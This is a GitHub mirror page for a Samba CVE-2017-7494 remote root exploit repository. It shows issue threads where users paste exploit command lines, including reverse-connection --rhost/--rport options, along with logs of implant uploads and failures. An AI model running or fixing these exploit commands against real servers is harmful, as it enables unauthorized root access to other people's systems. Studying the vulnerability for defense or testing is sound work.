joxeankoret / cve-2017-7494 Goto Github PK
View Code? Open in Web Editor NEWRemote root exploit for the SAMBA CVE-2017-7494 vulnerability
License: GNU General Public License v3.0
cve-2017-7494's People
Contributors
Stargazers
Watchers
Forkers
johnjohnsp1 infernalheaven wflk rainism cys3c hoangcuongflp maurice-schuppe zhuyue1314 tmcmil awesome-security cs24 hohjgdhsj ognz iamtutu irpr0 houcy thenukebr adastmins peterpt youngforest bmoar pentestingtools cjjduck megamindat totoroha voraka heikipikker ch4p34un0ir pombredanne mehrdad-shokri surlybot hybridious tuian chouaibhm droberson tsondt amorb c002 dlat scopion 100talsec zulou alenazi90 kaxbx bxlcity 8l4nk pentestbr blocky2019 iw00tr00t ashr kkilloas jibanli leandroald7 n0pz weeeelye caleb20000 diegoalbuquerque borari br3ach3r-fff fdlucifer nosorry cxzero roxas-tan ch4ng3thew0rld 0xm4ud mohinparamasivam reposities z3ro110 chengcheng227 yeti-coder iamanubhavsaini jackbro jeongzero8732 elijahahianyo zha0 3tternp khugankcve-2017-7494's Issues
How to use it?
Hi, I'm very curious about how to use it.
Can you add a tutorial to use it?
Thanks. Great job.
Failed to locate the module
Hello,
I was trying to run the exploit, but always got the same message: it seems like the xploit don't find the module on the target.
Any help to get this work? I tried to upload the module using smbclient, but still got the same message.
PS. if the no-compile options is 0, I got several library errors for 32bits.
python cve_2017_7494.py -t 172.16.1.107 -p 445 --rhost=172.20.1.162 --rport=443 -m //libimplantx64.so --no-compile=1
[Wed Sep 5 10:53:05 2018] I will keep the current binaries. No need for new compilation.
[Wed Sep 5 10:53:05 2018] Logging into the Samba server 172.16.1.107:445
[Wed Sep 5 10:53:06 2018] Using a GUEST session
[Wed Sep 5 10:53:06 2018] Trying to load module //libimplantx64.so
[Wed Sep 5 10:53:07 2018] Error: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
Error: The NETBIOS connection with the remote host timed out
HI i gotten this error while executing your script, any idea how to resolve
IOError: [Errno 2] No such file or directory: 'libimplantx64.so'
trying to use the exploit on 139 port:
python cve_2017_7494.py -t -p 139 --rhost --rport 31337 -n 1
and i got this output:
[..] I will keep the current binaries. No need for new compilation.
[..] Logging into the Samba server ip:port
[..] Using a GUEST session
[..] Using libimplantx64.so
[..] Trying to copy library 'n5R8qbmA.so' to share '[u'docs', u'/usr/share/doc']'
Traceback (most recent call last):
File "cve_2017_7494.py", line 254, in
main()
File "cve_2017_7494.py", line 248, in main
if exploit.exploit():
File "cve_2017_7494.py", line 196, in exploit
server_directory = self.try_copy_library(lib_name)
File "cve_2017_7494.py", line 165, in try_copy_library
if self.try_put(share, lib_name, real_file):
File "cve_2017_7494.py", line 117, in try_put
with open(real_file, "rb") as f:
IOError: [Errno 2] No such file or directory: 'libimplantx64.so'
Cannot resolve local IP address.
Traceback (most recent call last):
File "cve_2017_7494.py", line 212, in
main()
File "cve_2017_7494.py", line 206, in main
if exploit.exploit():
File "cve_2017_7494.py", line 161, in exploit
if not self.make_library():
File "cve_2017_7494.py", line 89, in make_library
raise Exception("Cannot resolve local IP address!")
Exception: Cannot resolve local IP address!
how does this determine the full path?
I am trying to use this exploit against a samba 3.5.11 server but it's not working out of the box. The writable share is called /test and this exploit is trying to use the full path /usr/local/samba/tmp/. I am going through the source but thought it might be useful to ask directly how this exploit is determining this path.
Thank you!
root@kali:/CVE-2017-7494# python cve_2017_7494.py -t 10.11.1.129
[Sun Dec 16 10:21:39 2018] Building libraries...
gcc -shared -fPIC -Wall -Wno-nonnull implant.c -o libimplantx64.so
gcc -shared -fPIC -Wall -Wno-nonnull implant.c -o libimplantx32.so -m32
[Sun Dec 16 10:21:39 2018] Logging into the Samba server 10.11.1.129:445
[Sun Dec 16 10:21:40 2018] Using a GUEST session
[Sun Dec 16 10:21:40 2018] Using libimplantx64.so
[Sun Dec 16 10:21:40 2018] Trying to copy library 'T1XOvrsK.so' to share '[u'test', u'/usr/local/samba/tmp']'
[Sun Dec 16 10:21:41 2018] Done!
[Sun Dec 16 10:21:41 2018] Trying to copy random library T1XOvrsK.so
[Sun Dec 16 10:21:41 2018] Trying to load module /usr/local/samba/tmp/T1XOvrsK.so
[Sun Dec 16 10:21:41 2018] Error: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
Ubuntu 18.04 running error
gcc -shared -fPIC -Wall -Wno-nonnull implant.c -o libimplantx32.so -m32
In file included from implant.c:16:0:
/usr/include/stdio.h:27:10: fatal error: bits/libc-header-start.h: No such file or directory
#include <bits/libc-header-start.h>
^~~~~~~~~~~~~~~~~~~~~~~~~~
compilation terminated.
Makefile:10: recipe for target 'libimplantx32.so' failed
make: *** [libimplantx32.so] Error 1
Error while executing the script
Error in test
Dear Joxean,
I'm testing one of my vulnerability machine with samba smbd 4.3.8-Ubuntu, and found your code.
I tried to reproduce the exploit but this is the error which i got:
python cve_2017_7494.py -t 192.168.1.220
Traceback (most recent call last):
File "cve_2017_7494.py", line 212, in
main()
File "cve_2017_7494.py", line 206, in main
if exploit.exploit():
File "cve_2017_7494.py", line 161, in exploit
if not self.make_library():
File "cve_2017_7494.py", line 89, in make_library
raise Exception("Cannot resolve local IP address!")
Exception: Cannot resolve local IP address!
Can you tell me where i did wrong? do i need to change the IP address in config file?
Thank you so much for your help.
add custom share name
req for an argument to put a custom share name
No module named Util.number
I've cloned the master branch, I've installed the requirements via a venv, and I get this error when running the exploit.
python2 cve_2017_7494.py -t 192.168.1.84
Traceback (most recent call last):
File "cve_2017_7494.py", line 20, in <module>
from impacket.dcerpc.v5 import transport, srvs
File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/dcerpc/v5/transport.py", line 18, in <module>
from impacket.smbconnection import smb, SMBConnection
File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/smbconnection.py", line 20, in <module>
from impacket import smb, smb3, nmb, nt_errors, LOG
File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/smb.py", line 53, in <module>
from impacket.krb5.gssapi import KRB5_AP_REQ
File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/krb5/gssapi.py", line 17, in <module>
from Crypto.Hash import HMAC, MD5
File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/krb5/Crypto.py", line 48, in <module>
from Crypto.Util.number import GCD as gcd
ImportError: No module named Util.number
I've installed both packages :
# pip install pycrypto
# pip show pycrypto
Name: pycrypto
Version: 2.6.1
Summary: Cryptographic modules for Python.
Home-page: http://www.pycrypto.org/
Author: Dwayne C. Litzenberger
Author-email: [email protected]
License: UNKNOWN
Location: /root/.virtualenvs/CVE-2017-7494/lib/python3.9/site-packages
Requires:
Required-by:
# pip install pycryptodome
# pip show pycryptodome
Name: pycryptodome
Version: 3.10.1
Summary: Cryptographic library for Python
Home-page: https://www.pycryptodome.org
Author: Helder Eijs
Author-email: [email protected]
License: BSD, Public Domain
Location: /root/.virtualenvs/CVE-2017-7494/lib/python3.9/site-packages
Requires:
Required-by:
What have I done wrong ? Any ideas ? Thanks :)
SMB SessionError
Need help on this
[Mon Nov 23 23:34:38 2020] I will keep the current binaries. No need for new compilation.
[Mon Nov 23 23:34:38 2020] Logging into the Samba server 10.0.2.18:445
[Mon Nov 23 23:34:38 2020] Using a GUEST session
[Mon Nov 23 23:34:38 2020] Using libimplantx64.so
[Mon Nov 23 23:34:38 2020] Trying to copy library 'JJAnPsko.so' to share '[u'print$', u'/var/lib/samba/printers']'
[Mon Nov 23 23:34:38 2020] Done!
[Mon Nov 23 23:34:38 2020] Trying to copy random library JJAnPsko.so
[Mon Nov 23 23:34:38 2020] Trying to load module /var/lib/samba/printers/JJAnPsko.so
[Mon Nov 23 23:34:38 2020] Error: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.